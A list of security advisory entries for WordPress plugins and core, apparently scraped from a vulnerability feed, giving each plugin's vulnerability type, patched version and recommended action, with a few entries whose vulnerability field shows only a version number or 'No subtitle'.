Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.35
Recommended Action: Update to version 1.5.35, or a newer patched version

Plugin: Simple Membership

Vulnerability: Open Redirect
Patched Version: 4.4.2
Recommended Action: Update to version 4.4.2, or a newer patched version

Plugin: Logo Showcase – Responsive Logo Carousel, Logo Slider & Logo Grid

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: iQ Block Country

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.2.12
Recommended Action: Update to version 1.2.12, or a newer patched version

Plugin: Zoho SalesIQ – Live chat, chatbots, and visitor tracking

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: WooCommerce Email Test

Vulnerability: Sensitive Data Exposure
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: OAuth client Single Sign On for WordPress ( OAuth 2.0 SSO )

Vulnerability: Missing Authorization
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: Magic Fields

Vulnerability: Cross-Site Scripting via custom-write-panel-id Parameter
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Giveaway

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple 301 Redirects By BetterLinks – Easy Redirect Manager for WP, 404 Error Log & More

Vulnerability: 2.0.3
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Adblock Blocker

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Denial of Service via XML #2
Patched Version: 3.7.4
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.4, 3.8.4, 3.9.2

Plugin: TerraClassifieds – Simple Classifieds Plugin

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Dynamic XML Sitemaps Generator for Google

Vulnerability: Cross-Site Request Forgery to Plugin Settings Changes
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: BigContact Contact Page

Vulnerability: Cross-Site Request Forgery leading to Plugin Settings Updates
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – Content Restriction

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Bing Site Verification plugin using Meta Tag

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Admin Settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Multivendor Marketplace – REST API

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Order/Order Note Disclosure, Order Note Addition via REST API
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Newsletter Meenews

Vulnerability: Cross-Site Scripting
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: Cryptocurrency Widgets – Price Ticker & Coins List

Vulnerability: 2.6.5
Patched Version: 2.6.6
Recommended Action: Update to version 2.6.6, or a newer patched version

Plugin: WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: YASR – Yet Another Star Rating Plugin for WordPress

Vulnerability: Authenticated (Subscriber+) Cross-Site Scripting via Shortcodes
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Perfmatters

Vulnerability: Missing Authorization
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in widgets_watch_data function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Social Like Box and Page by WpDevArt

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.8.41
Recommended Action: Update to version 0.8.41, or a newer patched version

Plugin: miwoftp

Vulnerability: Cross-Site Request Forgery leading to Remote Code Execution
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Server-Side Request Forgery leading to Host Information Disclosure
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: FL3R FeelBox

Vulnerability: Cross-Site Request Forgery leading to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Ship to Multiple Addresses

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.6
Recommended Action: Update to version 3.8.6, or a newer patched version

Plugin: 10Web Map Builder for Google Maps

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.72
Recommended Action: Update to version 1.0.72, or a newer patched version

Plugin: Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress

Vulnerability: Information Disclosure
Patched Version: 5.0.2
Recommended Action: Update to version 5.0.2, or a newer patched version

Plugin: Menu Cart for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.12.0
Recommended Action: Update to version 2.12.0, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Cross-Site Request Forgery via pms-cross-promotion.php
Patched Version: 3.10.4
Recommended Action: Update to version 3.10.4, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Enable Accessibility

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses

Vulnerability: Improper Access Controls
Patched Version: 2.0.29
Recommended Action: Update to version 2.0.29, or a newer patched version

Plugin: Logo Showcase – Responsive Logo Carousel, Logo Slider & Logo Grid

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: WP Photo Album Plus

Vulnerability: Stored Cross-Site Scripting
Patched Version: 8.1.00
Recommended Action: Update to version 8.1.00, or a newer patched version

Plugin: Simple SEO

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.13
Recommended Action: Update to version 1.8.13, or a newer patched version

Plugin: SW Product Bundles

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Leaflet Map

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.13
Recommended Action: Update to version 3.2.13, or a newer patched version

Plugin: RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 4.19.2
Recommended Action: Update to version 4.19.2, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 3.1.10
Recommended Action: Update to version 3.1.10, or a newer patched version

Plugin: Ultimate Carousel For Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘s’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Image Regenerate & Select Crop

Vulnerability: Missing Authorization on multiple AJAX actions
Patched Version: 7.2.0
Recommended Action: Update to version 7.2.0, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Cloak Front End Email

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection via WP_Query
Patched Version: 3.7.37
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.37, 3.8.37, 3.9.35, 4.0.34, 4.1.34, 4.2.31, 4.3.27, 4.4.26, 4.5.25, 4.6.22, 4.7.22, 4.8.18, 4.9.19, 5.0.15, 5.1.12, 5.2.14, 5.3.11, 5.4.9, 5.5.8, 5.6.7, 5.7.5, 5.8.3

Plugin: Resume Submissions & Job Postings

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.1.3
Recommended Action: Update to version 1.8.1.3, or a newer patched version

Plugin: Site Offline Or Coming Soon Or Maintenance Mode

Vulnerability: Cross-Site Request Forgery and Cross-Site Scripting
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Premium Seo Pack – Light Version

Vulnerability: Local File Disclosure and Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: No API Amazon Affiliate

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.4.0
Recommended Action: Update to version 4.4.0, or a newer patched version

Plugin: Finalist

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Evaluate

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Rencontre – Dating Site

Vulnerability: Privilege Escalation
Patched Version: 3.11
Recommended Action: Update to version 3.11, or a newer patched version

Plugin: Elementor Addons by Livemesh

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 7.2.4
Recommended Action: Update to version 7.2.4, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Missing Access Control leading to Authenticated (Subscriber+) Sensitive Information Disclosure
Patched Version: 3.4.11
Recommended Action: Update to version 3.4.11, or a newer patched version

Plugin: Library Viewer

Vulnerability: Open Redirect via ‘redirect_to’
Patched Version: 2.0.6.1
Recommended Action: Update to version 2.0.6.1, or a newer patched version

Plugin: Log HTTP Requests

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Virim

Vulnerability: PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: spnbabble

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Async JavaScript

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.20.02.27
Recommended Action: Update to version 2.20.02.27, or a newer patched version

Plugin: Staff / Employee Business Directory for Active Directory

Vulnerability: Insufficient Escaping of Stored LDAP Values
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Authenticated (Contributor+) Server-Side Request Forgery in template_importer
Patched Version: 2.6.7
Recommended Action: Update to version 2.6.7, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Authenticated (Contributor+) PHP Object Injection
Patched Version: 5.12.5
Recommended Action: Update to one of the following versions, or a newer patched version: 5.12.5, 6.1.0

Plugin: Solidres – Hotel booking plugin for WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SEO Redirection Plugin – 301 Redirect Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.4
Recommended Action: Update to version 7.4, or a newer patched version

Core: WordPress

Vulnerability: Misconfiguration That Allows Trigger of New Installation
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: New Adman

Vulnerability: Cross-Site Request Forgery via plugin_menu
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Full Path Disclosure
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Timetable and Event Schedule by MotoPress

Vulnerability: Arbitrary User’s Hashed Password/Email/Username Disclosure
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Pinpoint Booking System – #1 WordPress Booking Plugin

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 2.9.9.2.9
Recommended Action: Update to version 2.9.9.2.9, or a newer patched version

Plugin: Favicon by RealFaviconGenerator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.21
Recommended Action: Update to version 1.3.21, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.7.0.1
Recommended Action: Update to version 3.7.0.1, or a newer patched version

Plugin: Futurio Extra

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: SRS Simple Hits Counter

Vulnerability: 1.04
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Float menu – awesome floating side menu

Vulnerability: Arbitrary Menu Deletion via Cross-Site Request Forgery
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: User Rights Access Manager

Vulnerability: Access Restriction Bypass
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.9
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.9, 2.1.1

Plugin: Avada (Fusion) Builder

Vulnerability: Reflected Cross-Site Scripting via User Register Element
Patched Version: 3.11.2
Recommended Action: Update to version 3.11.2, or a newer patched version

Plugin: DTracker

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Authenticated SQL Injection
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: Easy Digital Downloads – Pushover notifications

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Live Chat & AI Chatbots – onWebChat

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Albo Pretorio On line

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6.4
Recommended Action: Update to version 4.6.4, or a newer patched version

Plugin: News Announcement Scroll

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 9.0.0
Recommended Action: Update to version 9.0.0, or a newer patched version

Plugin: Mediabay – Media Library Folders

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: W3 Total Cache

Vulnerability: Server Side Request Forgery
Patched Version: 0.9.7.4
Recommended Action: Update to version 0.9.7.4, or a newer patched version

Plugin: Intuitive Custom Post Order

Vulnerability: Missing Authorization to Authenticated Settings Change
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Essential Addons for Elementor Pro

Vulnerability: Unauthenticated Server-Side Request Forgery
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: Sayfa Sayac

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Login | Login Page | Login Logo | Rename Login Page | Custom Login Page | Temporary Users | Rebrand Login | Login Captcha

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: salient-core

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Cross-Site Request Forgery to Arbitrary Log Deletion
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.9.9
Recommended Action: Update to version 2.9.9, or a newer patched version

Plugin: OTP Login Woocommerce (Login with OTP)

Vulnerability: Authentication Bypass to Privilege Escalation
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.22
Recommended Action: Update to version 2.0.22, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Missing Authorization via save_fields_settings
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: PPC Tracker WordPress Plugin

Vulnerability: Stored Cross-Site Scripting via IP
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Admin Management Xtended

Vulnerability: Missing Authorization Checks
Patched Version: 2.4.0.1
Recommended Action: Update to version 2.4.0.1, or a newer patched version

Plugin: myLinksDump

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CataBlog

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.7.1.1
Recommended Action: Update to version 2.7.1.1, or a newer patched version

Plugin: Weather Station

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.8.13
Recommended Action: Update to version 3.8.13, or a newer patched version

Plugin: Delete All Comments

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Site Verify

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via subscriber_email parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: ImageMagick Engine

Vulnerability: Cross-Site Request Forgery to Remote Command Execution
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Request Forgery to OAuth Service Disconnection
Patched Version: 3.4.34
Recommended Action: Update to version 3.4.34, or a newer patched version

Plugin: Mercado Pago payments for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.7.0
Recommended Action: Update to version 6.7.0, or a newer patched version

Plugin: Easy FAQ with Expanding Text

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Sensitive Information Disclosure
Patched Version: 7.3.1
Recommended Action: Update to version 7.3.1, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery via ‘clear_page_cache’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Missing Authorization in ‘ajax_deactivate’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: JavaScript Injection
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Elementor Addons by Livemesh

Vulnerability: No subtitle
Patched Version: 6.8
Recommended Action: Update to version 6.8, or a newer patched version

Plugin: Yoast SEO: Local

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 14.9
Recommended Action: Update to version 14.9, or a newer patched version

Plugin: Custom Login

Vulnerability: Missing Authorization
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: CM Answers – Powerful WordPress Forum Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.10.43
Recommended Action: Update to version 7.10.43, or a newer patched version

Plugin: Search Logger – Know What Your Visitors Search

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Embed for HubSpot Forms, CTAs, Links, Files & add HubSpot to WP Search Results

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP App Maker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Customer Reviews for WooCommerce

Vulnerability: Cross-Site Request Forgery via manual review reminders
Patched Version: 5.38.2
Recommended Action: Update to version 5.38.2, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_id
Patched Version: 19.1.5.1
Recommended Action: Update to version 19.1.5.1, or a newer patched version

Plugin: Survey Maker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: WordPress Sentinel

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Prevent files / folders access

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload in mo_media_restrict_page
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: SQL Injection
Patched Version: 3.8.9
Recommended Action: Update to version 3.8.9, or a newer patched version

Plugin: Custom Map

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Export All Posts, Products, Orders, Refunds & Users

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Eventr

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Customer Service Software & Support Ticket System

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.13
Recommended Action: Update to version 5.13, or a newer patched version

Plugin: Securimage-WP-Fixed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection

Vulnerability: SQL Injection
Patched Version: 6.930
Recommended Action: Update to version 6.930, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Missing Authorization
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: Biometric Login For WooCommerce

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Campaign URL Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: College publisher Import

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Spell Check

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 9.3
Recommended Action: Update to version 9.3, or a newer patched version

Plugin: Responsive Plus – Starter Templates, Advanced Features and Customizer Settings for Responsive Theme.

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.6.9
Recommended Action: Update to version 2.6.9, or a newer patched version

Plugin: A Page Flip Book

Vulnerability: Directory Traversal
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Unauthenticated SQL Injection
Patched Version: 8.1.5
Recommended Action: Update to version 8.1.5, or a newer patched version

Plugin: Careerfy

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: Custom Content Shortcode

Vulnerability: Authenticated Arbitrary File Access / Local File Inclusion
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Authenticated Code Injection
Patched Version: 4.1.0.2
Recommended Action: Update to version 4.1.0.2, or a newer patched version

Plugin: Login | Login Page | Login Logo | Rename Login Page | Custom Login Page | Temporary Users | Rebrand Login | Login Captcha

Vulnerability: 1.1.1
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: WordPress Calls to Action

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Post to CSV by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Google XML Sitemap for Mobile

Vulnerability: Cross-Site Request Forgery via mobile_sitemap_generate
Patched Version: No patched version available
